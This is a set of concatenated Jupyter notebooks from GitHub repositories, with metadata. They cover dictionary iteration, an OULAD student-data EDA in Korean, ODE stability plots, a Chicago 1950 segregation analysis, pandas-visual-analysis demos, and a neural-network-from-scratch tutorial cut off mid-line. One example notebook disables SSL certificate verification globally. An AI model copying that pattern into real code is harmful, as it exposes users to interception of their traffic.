[ "Apache-2.0" ]
1
2020-12-31T18:03:34.000Z
2020-12-31T18:03:34.000Z
dictionary/iterate_over_dictionary_solution.ipynb
cntfk2017/Udemy_Python_Hand_On
52f2a5585bfdea95d893f961c8c21844072e93c7
[ "Apache-2.0" ]
null
null
null
dictionary/iterate_over_dictionary_solution.ipynb
cntfk2017/Udemy_Python_Hand_On
52f2a5585bfdea95d893f961c8c21844072e93c7
[ "Apache-2.0" ]
2
2019-09-23T14:26:48.000Z
2020-05-25T07:09:26.000Z
18.551282
79
0.461645
[ [ [ "# Write a Python program to iterate over dictionaries using for loops.\n\nd = {'x': 10, 'y': 20, 'z': 30} \nfor dict_key, dict_value in d.items():\n print(dict_key,'->',dict_value)\n\t\n", "x -> 10\ny -> 20\nz -> 30\n" ], [ "d = {'x': 10, 'y': 20, 'z': 30} \nfor dict_key, dict_value in d.items():\n print(dict_key,'->',dict_value)", "x -> 10\ny -> 20\nz -> 30\n" ] ] ]
[ "code" ]
[ [ "code", "code" ] ]
e72d9681a787260a75d9533fb4175b8e3de8cfe3
35,416
ipynb
Jupyter Notebook
0_table data EDA.ipynb
springkind/OULAD
92e956740bfa8133bbfdc2d05bdb9cb5f00d423a
[ "CC-BY-4.0" ]
null
null
null
0_table data EDA.ipynb
springkind/OULAD
92e956740bfa8133bbfdc2d05bdb9cb5f00d423a
[ "CC-BY-4.0" ]
2
2021-08-16T15:23:38.000Z
2021-08-17T15:41:52.000Z
0_table data EDA.ipynb
springkind/OULAD
92e956740bfa8133bbfdc2d05bdb9cb5f00d423a
[ "CC-BY-4.0" ]
null
null
null
29.390871
158
0.349531
[ [ [ "import pandas as pd", "_____no_output_____" ], [ "courses = pd.read_csv('./data/courses.csv')\nassessments = pd.read_csv('./data/assessments.csv')\nvle = pd.read_csv('./data/vle.csv')\nstudentInfo = pd.read_csv('./data/studentInfo.csv')\nstudentRegistration = pd.read_csv('./data/studentRegistration.csv')\nstudentAssessment = pd.read_csv('./data/studentAssessment.csv')\nstudentVle = pd.read_csv('./data/studentVle.csv')", "_____no_output_____" ] ], [ [ "## 테이블 데이터 확인", "_____no_output_____" ], [ "### COURSES", "_____no_output_____" ] ], [ [ "courses.head()", "_____no_output_____" ] ], [ [ "courses 데이터에서는 시작 학기에따라 B(2월 시작), J(10월 시작)를 code_presentation에 붙인다.\\\n같은 강좌라도 학기별로 구조나 세부 내용이 다를 수 있기 때문에 따로 분리해서 봐야하는데,\\\ncode_module이 CCC, EEE, GGG인 코스의 경우 이전 기수 B, J 수강 내역이 없는 데이터로 이루어져 있다.", "_____no_output_____" ] ], [ [ "courses[courses['code_module'] == 'CCC']", "_____no_output_____" ] ], [ [ "### ASSESSMENTS", "_____no_output_____" ], [ "강좌마다 학기별로 나간 과제에 대한 정보.\\\n모든 강좌는 몇가지 과제 후 기말 시험을 치르게 된다.\n\n- **date** : 제출일. module-presentation이 시작된 날짜 기준 0일 부터 시작. 기말고사의 date 값이 결측치일 경우 presentation의 마지막 week임.\n- **weight** : 과제 비율. Exam은 과제와 별개로 다뤄지기 때문에 100%로 표기된다. Exam 이외의 assessments의 weight를 모두 합하면 100%가 됨.\n- **assessment_type** : \n - Tutor Marked Assessment (TMA)\n - Computer Marked Assessment (CMA)\n - Final Exam (Exam)", "_____no_output_____" ] ], [ [ "assessments.head()", "_____no_output_____" ] ], [ [ "### VLE", "_____no_output_____" ], [ "온라인 학습 환경의 html page, pdf 파일 등의 정보. 리소스? 학습용 meterial.\n\n- **week_from ~ week_to** : 몇주부터 몇주까지 해당 meterials를 학습하도록 설계되어있는지.", "_____no_output_____" ] ], [ [ "vle.head()", "_____no_output_____" ], [ "vle[vle['week_from'].notna()].head()", "_____no_output_____" ] ], [ [ "### studentInfo", "_____no_output_____" ], [ "- **imd_band** : 지역별 결핍(빈곤) 지수. 소득, 고용, 교육, 건강, 범죄 등으로 계산됨.\\\nhttps://en.wikipedia.org/wiki/Multiple_deprivation_index", "_____no_output_____" ] ], [ [ "studentInfo.head()", "_____no_output_____" ] ], [ [ "### studentRegistration", "_____no_output_____" ], [ "module-presentation 등록 데이터. module-presentation이 시작된 시점과 연관이 있다.\n\n- **date_registration** : 등록일자. -30인 경우 해당 수강생이 module-presentation이 시작되기 30일 전에 등록한 것.\n- **date_unregistration** : 수강취소를 한 경우 기록됨. 12인 경우 module-presentation이 시작된 후 12일 후에 등록 취소한 것. 빈값일 경우 수강을 끝까지 잘 마친 것.\n\ndate_unregistration이 빈 값이 아닐 경우 studentInfo.csv의 final_result 컬럼이 'Withdrawal'로 표기됨.", "_____no_output_____" ] ], [ [ "studentRegistration.head()", "_____no_output_____" ], [ "studentRegistration[studentRegistration['date_unregistration'].notna()].head()", "_____no_output_____" ] ], [ [ "### studentAssessment", "_____no_output_____" ], [ "과제 제출 현황.과제를 제출 안한 경우 기록되지 않는다.\\\n만약 과제 결과가 시스템에서 누락될 경우 기말고사 제출내역은 기록되지 않음.\n\n- **date_submitted** : module-presentation 시작 날짜 기준, 제출일.\n- **is_banked** : a status flag indicating that the assessment result has been transferred from a previous presentation.(이전 presentation과 연관성이 있는지?)\n- **score** : 0 ~ 100 사이의 값. 40보다 작을 경우 Fail.", "_____no_output_____" ] ], [ [ "studentAssessment.head()", "_____no_output_____" ] ], [ [ "### studentVle", "_____no_output_____" ], [ "학생들이 VLE와 상호작용한 데이터.\n\n- **id_site** : VLE meterial id.\n- **date** : module-presentation 시작 날짜 기준, 이벤트 날짜.\n- **sum_click** : 해당 날짜에 있었던 클릭 수 집계.", "_____no_output_____" ] ], [ [ "studentVle.head()", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ] ]
e72d99614ed39e708d73491cfb4a3fb6ba9b3986
111,612
ipynb
Jupyter Notebook
Apuntes de clases/b04_Clase 13 de marzo_Sistemas de control.ipynb
AlexRojas06/Trabajos_realizados_en_clase
d13682db960cdebceffbdaaf14dc695129beae2d
[ "MIT" ]
null
null
null
Apuntes de clases/b04_Clase 13 de marzo_Sistemas de control.ipynb
AlexRojas06/Trabajos_realizados_en_clase
d13682db960cdebceffbdaaf14dc695129beae2d
[ "MIT" ]
null
null
null
Apuntes de clases/b04_Clase 13 de marzo_Sistemas de control.ipynb
AlexRojas06/Trabajos_realizados_en_clase
d13682db960cdebceffbdaaf14dc695129beae2d
[ "MIT" ]
null
null
null
528.966825
76,592
0.943106
[ [ [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.integrate import odeint", "_____no_output_____" ] ], [ [ "$$\\dot{x}+c{x}=0$$\n$$V(x)=\\frac{1}{2}{x^2}$$\n", "_____no_output_____" ] ], [ [ "def f(x,t):\n dx=-x\n return dx\n\n#t = np.linspace(0,20,200)\nt=np.arange(0,3,.1)\nx0=-.0043\nys=odeint(f,x0,t)\n\nplt.plot(t,ys[:,0])", "_____no_output_____" ] ], [ [ "$$\\dot{x_1}=-x_1$$\n$$\\dot{x_2}=-2x_2$$\n\n$$V(x)=\\frac{1}{2}{x^2}$$\n$$\\dot{V}(x) = {x}\\dot{x} = [x_1,x_2][{\\dot{x}_1}{\\dot{x}_2}]^T=x_1\\dot{x}_1+x_2\\dot{x}_2$$\n\n$$\\dot{V}(x_1,x_2)=-{x_1}^2-2{x_2}^2$$", "_____no_output_____" ] ], [ [ "def f(x,t):\n x1,x2=x\n dx1=-x1\n dx2=-2*x2\n return [dx1,dx2]\n\n#t=np.linspace(0,20,200)\nt=np.arange(0,3,.1)\nx0=[4,4]\nys=odeint(f,x0,t)", "_____no_output_____" ], [ "y1=np.linspace(-8.0,8.0,20)\ny2=np.linspace(-8.0,8.0,20)\nX,Y=np.meshgrid(y1,y2)\n\nU,V=f([X,Y],0)\nplt.figure(figsize=(9,8))\nQ=plt.quiver(X,Y,U,V,color='r')\nplt.plot(ys[:,0],ys[:,1],'b-') #path\nplt.plot([ys[0,0]], [ys[0,1]], 'o')#start\nplt.plot([ys[-1,0]], [ys[-1,1]], 's')#end", "_____no_output_____" ], [ "def f(x,t):\n u=-2*x**2\n dx1=x**2+u\n return dx1\n\n#t=np.linspace(0,20,200)\nt=np.arange(0,3,.1)\nx0=[2,1]\nys=odeint(f,x0,t)\n\nplt.plot(t,ys[:,0])\nplt.plot(t,ys[:,1])", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
e72dc21cc21b8239b5999a4645748df49d409ac9
195,461
ipynb
Jupyter Notebook
example_distortion.ipynb
ceciledebezenac/segregation_index
0e57b925450dad60e7cd9f987ba5ce499edccd8f
[ "MIT" ]
1
2021-04-14T14:45:53.000Z
2021-04-14T14:45:53.000Z
example_distortion.ipynb
ceciledebezenac/segregation_index
0e57b925450dad60e7cd9f987ba5ce499edccd8f
[ "MIT" ]
1
2021-05-27T14:53:58.000Z
2021-05-27T14:53:58.000Z
example_distortion.ipynb
ceciledebezenac/segregation_index
0e57b925450dad60e7cd9f987ba5ce499edccd8f
[ "MIT" ]
null
null
null
483.814356
77,336
0.941779
[ [ [ "# Mulitscale segregation measures using a KL-divergence based method", "_____no_output_____" ], [ "This is an example notebook to demonstrate the use of this particular python module, segregation_distortion. This particular module from the distortion library can be used to calculate similar variations of a segregation measure, the distortion index over an entire city, given the population categories and the coordinates of spatial units. Other libraries are required to be installed before running the code. They are automatically installed when setting up the modules. \n\n### Requirements", "_____no_output_____" ] ], [ [ "#change indexes names and add a quick description of why the index is useful. \n#unit testing for the class framework\n#GIO interface for uploading data and plotting the map\n#make a script for command line\nfrom divergence import segregation_distortion as seg\nimport geopandas as gdp\nimport pandas\nimport itertools as it\nimport matplotlib.pyplot as plt\nimport timeit", "_____no_output_____" ] ], [ [ "### Read in and analyse the data\n\nNow let's actually read in some data to work with. The module is designed to run with any geolocated data, provided categorial variables are included as well as a geometry columns used by python for plotting and neighbourhood attribution. We will work with 1950 census data from Chicago. This data can be downloaded here (github link). We use Geopandas to load the dataframe. Check for more detailed documentation on Geopandas here (lien internet). ", "_____no_output_____" ] ], [ [ "geochicago=gdp.read_file('/Users/cdebezenac/Documents/chicago_segregation/data/chicago1950.shp')", "_____no_output_____" ] ], [ [ "We will want to get a better look at the raw data (although this set has already been cleaned up a bit) to check for empty, redundant cells or any other flaw that could make running our code difficult. ", "_____no_output_____" ] ], [ [ "print('There are ' + str(len(geochicago))+' tracts in Chicago.\\n\\n',geochicago.head(),geochicago.columns)", "There are 937 tracts in Chicago.\n\n GISJOIN2 SHAPE_AREA TRACT B0E001 B0E002 B0E003 B0E004 B0E005 \\\n0 17003100846 2.614179e+06 0846 460 150 105 110 175 \n1 17003100867 3.333835e+05 0867 35 35 15 30 85 \n2 17003100865 6.513552e+05 0865 125 55 35 45 110 \n3 17003100863 7.972477e+04 0863 25 10 10 0 20 \n4 17003100864 8.086402e+04 0864 20 5 5 5 10 \n\n B0E006 B0E007 ... B0E014 B0E015 Total White Nonwhite Negro \\\n0 285 415 ... 140 420 11416 11411 5 4 \n1 80 130 ... 5 25 3449 3446 3 0 \n2 200 215 ... 30 50 4969 4966 3 3 \n3 5 30 ... 10 5 842 842 0 0 \n4 5 90 ... 10 20 1013 1013 0 0 \n\n % White % Nonwhite % Negro \\\n0 0.999562 0.000438 0.000350 \n1 0.999130 0.000870 0.000000 \n2 0.999396 0.000604 0.000604 \n3 1.000000 0.000000 0.000000 \n4 1.000000 0.000000 0.000000 \n\n geometry \n0 POLYGON ((685476.7393863574 509025.6236453776,... \n1 POLYGON ((687619.6943893731 508023.3009851112,... \n2 POLYGON ((686059.3572701956 507863.6809653796,... \n3 POLYGON ((687112.3453625296 508798.6291569208,... \n4 POLYGON ((687515.20576993 508834.0681936329, 6... \n\n[5 rows x 26 columns] Index(['GISJOIN2', 'SHAPE_AREA', 'TRACT', 'B0E001', 'B0E002', 'B0E003',\n 'B0E004', 'B0E005', 'B0E006', 'B0E007', 'B0E008', 'B0E009', 'B0E010',\n 'B0E011', 'B0E012', 'B0E013', 'B0E014', 'B0E015', 'Total', 'White',\n 'Nonwhite', 'Negro', '% White', '% Nonwhite', '% Negro', 'geometry'],\n dtype='object')\n" ] ], [ [ "After a quick look at the variable dictionary, we can start to understand the data. The first columns represent administrative code for the area, the 'B0...' columns are attributed to income groups and the 'White','Nonwhite','Negro' represent the ethnic affiliation count in each tract. We note that 'Nonwhite' accounts for 'Negro' as well as others and that the 1950 naming convention is somewhat out of date. ", "_____no_output_____" ] ], [ [ "#seperate other from black\ngeochicago['Other']=geochicago['Nonwhite']-geochicago['Negro']\ngeochicago['% Other']=geochicago['% Nonwhite']-geochicago['% Negro']\n#rename a column\ngeochicago.rename(columns={'Negro':'Black'},inplace=True)", "_____no_output_____" ] ], [ [ "### Create the city framework for segregation analysis\n\nLet's now initialise our divergence object used as a city frame for the calculation of the indices. If we want to calculate the local indices for one single unit, we create an instance of the class LocalDivergenceProfile. If we wish to compare measures over all tracts, we use the DivergenceProfiles class from the div module. Initially, its attributes are: the dataframe given as a parameter, the variable names used for the population segmentation, the size of the city, the shape of the city, the coordinates of all units, a Demographics instance (see below), sup_distortion which is the greatest segregation index possible given the overall statistics of the city. The latter is used to normalise local indices. ", "_____no_output_____" ] ], [ [ "distortion_chicago=seg.DivergenceProfiles(geochicago,['White','Black','Other'])", "14 spatial units have been left out because of null values over all groups. Check your data or continue.\n" ] ], [ [ "### Initialise the neighbourhood structure to compute the divergence profiles\n\nThe max_distortion index and the excepted_divergence indices are both spatial. Therefore, before calculating anything (see help(LocalDivergenceProfile) for detailed computation of indices) we will need to set up a neighbourhood structure with the set_neighbourhood() method. Keeping this example simple, we will simple use the default distance measure which is the crow distance between centroids of tracts. This method is quite computationnaly expensive as it orders all 937 neighbours of all 937 tracts! It has been sped up since previous versions by vectorising operations as much as possible using numpy. Parallelising the code could optimise it further but this technique has not been explored here. Nevertheless, from several hours (up to a whole day in the first tries), this will take a dozen seconds on the Chicago data. Note that the complexity is not linear, trying it out on London for example, with well over 1000 units will considerably slow down the process. ", "_____no_output_____" ] ], [ [ "%time distortion_chicago.set_neighbourhood(path='euclidean')", "CPU times: user 12.9 s, sys: 9.62 ms, total: 12.9 s\nWall time: 12.9 s\n" ] ], [ [ "Once the structure is known, the bulk of the work is done! The rest is numpy array operations on population counts (see divergence documentation for more detail). Setting the KL divergence profiles for all 937 units will only take a few seconds more!", "_____no_output_____" ] ], [ [ "%time distortion_chicago.set_profiles()", "CPU times: user 6.93 s, sys: 16.8 ms, total: 6.95 s\nWall time: 6.95 s\n" ] ], [ [ "### Update the data\n\nNow we could use the raw data included in the DivergenceProfiles object, but we would rather use something we can actually plot easily using the basic geopandas library. So let's update the dataframe we fed into the city object and add columns representing the local variables and check if realistic indices have been added to the end. You may get a SettingWithCopyWarning when updating. While this should usually never be overlooked, this is raised because the attribute dataframe is a copy of the original one the user actually loads as a parameter. ", "_____no_output_____" ] ], [ [ "distortion_chicago.update_data()\n#distortion_chicago.dataframe.head()", "_____no_output_____" ] ], [ [ "### View the results\n\nEssentially, what the algorithm is doing to compute the local indices is summarise local profiles (described in the divergence documentation: max_index will average the superiour envelope of the profile). These trajectories can hide very relevant information on segregation as well as geographic patterns (neighbourhood definition for instance). For an overview, let's plot all of these. \n\n#### Profiles", "_____no_output_____" ] ], [ [ "distortion_chicago.plot_profiles([i for i in range(920)],(10,6))", "_____no_output_____" ], [ "#isolate fewer profiles, here the profile of the unit indexed by 0:\ndistortion_chicago.plot_profiles([0],(10,6))", "_____no_output_____" ] ], [ [ "#### Index distribution\n\nAnother good way of getting a quick look at the results is to plot the distribution of the indices into histograms available with maplotlib. We will try to plot something a litle nicer than the default python plot and save it on to our computer. This is done with the plot_distribution() method of the DivergenceProfiles class. ", "_____no_output_____" ] ], [ [ "distortion_chicago.plot_distribution(variable='max_index')", "_____no_output_____" ] ], [ [ "#### Spatial representation: Chicago map\n\nThe most interesting attribute of local segregation measures are that you can plot them on to the map of the city using the plot_map() method.", "_____no_output_____" ] ], [ [ "distortion_chicago.plot_map(variable='max_index_normal')", "_____no_output_____" ] ], [ [ "From this map, we can analyse the segregration trend in Chicago. The red tracts are those that have a high normalised distortion index. The most extreme values reach 45% of the value of the theoretically most segregated Chicago possible! They are visably all clustered in a middle easter area, where the first community of Blacks had settled before moving down south in the second half of the century. Chicago shows very high segregation between White and Black population. Although indices tend to decrease with time due to increased ethnic diversity, it still is one of the most striking examples among US cities. ", "_____no_output_____" ], [ "### Save the results\n\nOnce the dataframe has been updated it can be saved in shapefile format on to the user's computer by using the GeoPandas framework or using the built-in function in the DivergenceProfiles class, save_dataframe():", "_____no_output_____" ] ], [ [ "distortion_chicago.save_dataframe('distortion_data_chicago')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ] ]
e72dc24604c754a85bd5b47970570c045db4522f
5,481
ipynb
Jupyter Notebook
tests/notebooks/examples.ipynb
rishigarg94/pandas-visual-analysis
c9569878a44fb0f5d0acd8779ff65d51e1c1bd95
[ "MIT" ]
16
2020-09-03T20:58:40.000Z
2022-03-19T01:12:31.000Z
tests/notebooks/examples.ipynb
rishigarg94/pandas-visual-analysis
c9569878a44fb0f5d0acd8779ff65d51e1c1bd95
[ "MIT" ]
23
2020-08-26T19:47:54.000Z
2022-01-21T20:38:15.000Z
tests/notebooks/examples.ipynb
rishigarg94/pandas-visual-analysis
c9569878a44fb0f5d0acd8779ff65d51e1c1bd95
[ "MIT" ]
4
2020-08-26T19:46:37.000Z
2021-09-30T06:24:19.000Z
21.664032
120
0.528371
[ [ [ "import sys\nsys.path.append(\"../../src\")", "_____no_output_____" ], [ "import ssl\n\nssl._create_default_https_context = ssl._create_unverified_context", "_____no_output_____" ] ], [ [ "## Default mpg", "_____no_output_____" ] ], [ [ "import pandas as pd\nfrom pandas_visual_analysis import VisualAnalysis\n\ndf = pd.read_csv(\"https://raw.githubusercontent.com/mwaskom/seaborn-data/master/mpg.csv\")\n\nVisualAnalysis(df)", "_____no_output_____" ] ], [ [ "## DataSource", "_____no_output_____" ] ], [ [ "from pandas_visual_analysis import VisualAnalysis, DataSource\n\nds = DataSource(df)\nVisualAnalysis(ds)", "_____no_output_____" ] ], [ [ "## Categorical Columns", "_____no_output_____" ] ], [ [ "VisualAnalysis(df, categorical_columns=[\"name\", \"origin\", \"model_year\", \"cylinders\"])", "_____no_output_____" ] ], [ [ "## Layout", "_____no_output_____" ] ], [ [ "VisualAnalysis(df, layout=[[\"Scatter\", \"Scatter\"], [\"ParallelCoordinates\"]])", "_____no_output_____" ] ], [ [ "## Get all Widgets", "_____no_output_____" ] ], [ [ "VisualAnalysis.widgets()", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72ddf39196cb7706d103e165b5db16a89353fce
94,811
ipynb
Jupyter Notebook
Neural_Network_Fundamentals/1_NN_from_scratch.ipynb
romanarion/InformationSystemsWS1718
82a89f8288de9f2b5ef0bad8e9e5bbe2dfee317a
[ "MIT" ]
null
null
null
Neural_Network_Fundamentals/1_NN_from_scratch.ipynb
romanarion/InformationSystemsWS1718
82a89f8288de9f2b5ef0bad8e9e5bbe2dfee317a
[ "MIT" ]
null
null
null
Neural_Network_Fundamentals/1_NN_from_scratch.ipynb
romanarion/InformationSystemsWS1718
82a89f8288de9f2b5ef0bad8e9e5bbe2dfee317a
[ "MIT" ]
null
null
null
58.023868
11,674
0.733586
[ [ [ "# Neural Network Fundamentals", "_____no_output_____" ], [ "This blog post is a guide to help readers build a neural network from the very basics. It starts with an introduction to the concept of a neural networks concept and its early development. A step-by-step coding tutorial follows, through which relevant concepts are illustrated. Later in the post, there is also an introduction on how to build neural networks in Keras. Finally, the reader will find instructions on how to deploy the model via an API to make it accessible to anyone interested on it.", "_____no_output_____" ], [ "## Neural Networks and its early development", "_____no_output_____" ], [ "As the name tells, the idea of neural networks is inspired by how neurons work in the human brain. It is, however, crucial for the readers to know that despite the original motivation of neural networks, the NN models being used today have little resemblance to what a human brain does. In its basic form, neural networks are composed of nodes interconnected to each other in several layers. The basic form of a NN would include an input, a hidden and an output layer. The number of nodes and layers can add to the complexity and efficiency of neural networks. \n\nThe McCulloch-Pitts model of neuron in 1943 was one of the earliest simplified version of neural networks. It consisted of a simple neuron which received a weighted sum of inputs and output either zero if the sum was smaller than a threshold or one when it was greater than the threshold. This idea is called firing and is an interesting analogy to what an actual neuron does. Later on, in the early 1960s, Rosenblatt introduced the simple perceptron model. This was a developed version of the McCulloch-Pitts with an input and output layer. However, the linear separablilty limitation of simple perceptron took away the research interest in neural networks for a while. In the early 1980s, the Hopfield model of content-addressable memory, however, motivated researchers in the area again and later on with the introduction of backpropagation learning algorithm, interest in neural networks research soared. Nowadays, neural nets are used in a variety of applications to tackle problems such as classification, speech and image recognition, control systems and predictions.\n\nIn what follows, the reader will find an easy step-by-step guide on how to implement all these processes from scratch, the coding part of which draws inspiration from the works of [Nielsen, 2017](http://neuralnetworksanddeeplearning.com/index.html), [Dima, 2016](http://www.cristiandima.com/neural-networks-from-scratch-in-python/) and [Rashid, 2016](https://ebook4expert.com/2016/07/12/make-your-own-neural-network-ebook-free-by-tariq-rashid-epubmobi/).", "_____no_output_____" ], [ "# NN from scratch\n## Problem Statement\nThe best way to understand how neural networks work is to build one yourself from scratch.\nThe understanding becomes even more comprehensive if there is a particular problem that can be solved using NNs. Therefore let's start our work by taking a look at the picture below.", "_____no_output_____" ], [ "<img src=\"pics/problem.png\" alt=\"Drawing\" style=\"width: 600px;\"/>", "_____no_output_____" ], [ "There are handwritten numbers that you want computer to correctly classify. This would be an easy task for a person but at least for a long period of time was an extremely complicated one for a machine. \n\nEven though the computer is faster than the human brain in numeric computations, the brain outperforms the computer in some other tasks. Many of those tasks are related to the human ability for sentience (which is a concept different from intelligence). The trick is to find a way, so that the computer could apply its numeric computation skills to solve these later tasks (at least to some degree).\n\nThe first step would be to limit the scope of the task. In our particular case the broad task of image recognition will be addressed as a classification problem - a task of giving an object a label from a given set of labels.\n\nAs we will see during the process of building our own NN, its output is based almost exclusively on application of linear algebra methods. Despite the name (which is sometimes related to the fear of artificial intelligence), neural networks in fact are much more related to statistical methods (like regression analysis or curve fitting) than to the way human brain works [[Stuart Reid, 2014](http://www.turingfinance.com/misconceptions-about-neural-networks/)]. \n\nNNs are inspired by human brain only to certain extent. For instance the main element that makes them similar is a multilayer net structure of simple elements that are connected in some way, receiving and transmitting information. But the structure of the human brain is much more complicated, besides it is self-organizing and adaptive in contrast to the fixed manually designed architecture of a NN. Hence, there is a good reason to stop being afraid of neural networks and instead to create one ourselves.", "_____no_output_____" ], [ "<img src=\"pics/neurons_net3.png\" alt=\"Drawing\" style=\"width: 500px;\"/> [Source: [Pixabay.com](https://pixabay.com/)]", "_____no_output_____" ], [ "## Schematic Representation\n\nA complex multilayer structure that all neural networks have in common in a simplified way can be depicted using the following picture.", "_____no_output_____" ], [ "<img src=\"pics/neural_network1.jpg\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "All we need in order to implement such a structure is base Python and numpy, a library for numerical computation, which we will be using to do linear algebra. \n\nFirst let's determine the elements of a neural network depicted above: nodes, layers, weights across nodes and activation functions.\n\n**Nodes.** A node is basically a point where data points are received, processed and then transferred to the node. A node could be either an endpoint or a redistribution point or even both when iterations are done through the learning algorithm. The number of nodes to use is optional.\n\n**Layers.** A layer consists of one or several nodes. The initial layer in the network is called the input layer and it is the entry point through which the data is fed into the neural net. The middle layers are called hidden layer because the computation results of them are not directly visible to someone interacting with the neural net. In the hidden layers, which can range from one to thousands, the features are transformed and most of the structure (both linear and nonlinear) is captured. Finally, there is the final layer, from which results are output. The nodes in each layer are fully interconnected to the ones in the next and the previous layers. \n\nIn our case we have a structure with 3 layers: input, output and one hidden layer. The number of nodes in the input (\"i_n\"), hidden (\"h_n\") and output (\"o_n\") layers are 3, 5 and 2 respectively. In Python, such a structure can be represented in the following way:", "_____no_output_____" ] ], [ [ "# Load the package to work with numbers:\nimport numpy as np\n\n# Determine the structure of the NN:\ni_n = 3\nh_n = 5\no_n = 2", "_____no_output_____" ] ], [ [ "**Weights.** In order to transfer an input data point to the next layer, a predetermined number (called weight) is stored in each connection from the sender node to the receiver node. Each weight accounts for the impact between the interconnected nodes.\n\nInitially, we assign weights between nodes in neighboring layers randomly. This is needed only for the sake of initializing the structure. Later these weights will be changed in order to solve our classification problem. The weight updating will be better described in the following sections.\n\nNeural nets will have n-1 matrices of weights, where n is the number of layers in the NN. You can imagine these weight matrices sitting between two layers representing the strength of the connection between every single node of neighbouring layers. Thus, each of these matrices will be of size f x p, where p is the number of nodes in the preceding layer and f is the number of nodes in the following layer.\n\nThis becomes more clear once you check the code below that creates 2 matrices of weights:\n* matrix of weights between input and hidden layers (\"w_i_h\") - 5 by 3 matrix\n* matrix of weights between hidden and output layers (\"w_h_o\") - 2 by 5 matrix.\n\nSuch a dimensions of matrices are necessary in order to accomplish matrix and vector multiplications that are done in the following stages.", "_____no_output_____" ] ], [ [ "# Randomly define the weights between the layers:\nw_i_h = np.random.rand(h_n, i_n) # create an array of the given shape and populate it with random values.\nw_h_o = np.random.rand(o_n, h_n) \n\n# Show matrices of randomly assigned weights:\nw_i_h\n# w_h_o # uncomment this line in order to see the values for w_h_o.\n# Use Cmd + / in MacOS and CTRL + / in MS Windows as a shortcut to comment/uncomment lines.", "_____no_output_____" ] ], [ [ "**Activation Function.** The remaining element of the NN's structure is an activation function - a function which transforms an input data point that it receives from the previous nodes to an output value which will be the input for the nodes in the next layer. The activation function plays an important role in the efficiency of the neural network as it accounts for non-linearity of data. \nIt is to certain extent inspired by the concept of \"firing\", which means that neurons \"fire\" or transmit information further only if the input surpasses certain threshold. The simplest activation function can be represented by a step function as on the picture below.", "_____no_output_____" ], [ "<img src=\"pics/step_function.png\" alt=\"Drawing\" style=\"width: 700px\";/> [Source: [Research Gate](https://www.researchgate.net/figure/Three-different-types-of-transfer-function-step-sigmoid-and-linear-in-unipolar-and_306323136)]", "_____no_output_____" ], [ "In our NN, we will use a slightly more elaborate activation function, the sigmoid function (logistic), which allows for more efficient use of the input data. Extended description of various activation functions, their benefits and disadvantages is given in sections below.", "_____no_output_____" ] ], [ [ "# Determine activation function:\ndef sigmoid(x):\n # np.exp() calculates the exponential\n # of all elements in the input array.\n return 1 / (1 + np.exp(-x)) \n", "_____no_output_____" ], [ "# Draw activation function:\nimport matplotlib.pyplot as plt\n\n# return 100 evenly spaced numbers over an interval from -10 to 10.\nx = np.linspace(-10, 10, 100) \n# plot sigmoid function for sampled values:\nplt.plot(x, sigmoid(x)) \nplt.show()", "_____no_output_____" ] ], [ [ "## Data Inspection\n\nBy now we have collected all the elements of the NN. Can we use this structure in order to solve the classification problem stated in the beginning? In order to answer this question we need first to get a better understanding of the data at our disposal. \n\nWe are trying to check whether NN is able to solve the classification problem using a collection of 70 000 handwritten numbers. Each of this handwritten number is represented as 28x28 image. \n\nThe original source of the data is \"THE MNIST DATABASE\". A detailed description of the dataset is available at\nhttp://yann.lecun.com/exdb/mnist/. There you can also find, for example, a summary of the performance results achieved by various classification algorithms.\n\nFor the sake of simplicity we suggest obtaining the data from another source:\nhttps://pjreddie.com/projects/mnist-in-csv/. Here the original images are saved in CSV, which allows to work with them directly.\n\nFor the purposes of demonstration below we use a smaller dataset (100 images), which will be expanded at a later stage.", "_____no_output_____" ] ], [ [ "# Load the data:\nraw_data = open(\"data/mnist_train_100.csv\", 'r') # \"r\" stands for \"read only\" mode.\ndata = raw_data.readlines() # read all the lines of a file in a list.\nraw_data.close() # remove temporal file from the environment in order to save memory.", "_____no_output_____" ], [ "# Inspect the data - check the number of observations:\nlen(data) # length of the object.", "_____no_output_____" ], [ "# Inspect a particular observation of the data:\ndata[0] # show observation number 0 from the list (remember that in Python numbering starts from 0).", "_____no_output_____" ] ], [ [ "* A particular observation looks like a string of 785 elements (label of the image + 784 elements for each pixels of a 28x28 image). \n* Each element representing a pixel is a number from 0 to 255 (from white to black color).\n* The first element in the line is the label of the image and therefore is a number from 0 to 9.\n\nUsing `matplotlib`, we can also reconstruct the original image based on the data about each pixel in the string.", "_____no_output_____" ] ], [ [ "# Load the package to plot the data:\nimport matplotlib.pyplot as mpp\n%matplotlib inline", "_____no_output_____" ], [ "# Plot the data:\nobservation = data[0].split(',') # break down observation number 0 (comma is used to identify each element).\nimage = np.asfarray(observation[1:]).reshape((28,28)) # take all the elements starting from the 